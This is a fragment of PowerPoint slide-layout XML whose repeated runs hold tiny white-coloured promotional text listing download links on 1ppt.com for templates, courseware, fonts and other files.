              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout113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13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13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13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1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14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14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14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14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14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14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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout114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14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14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14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1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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout115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15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15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15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15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15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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
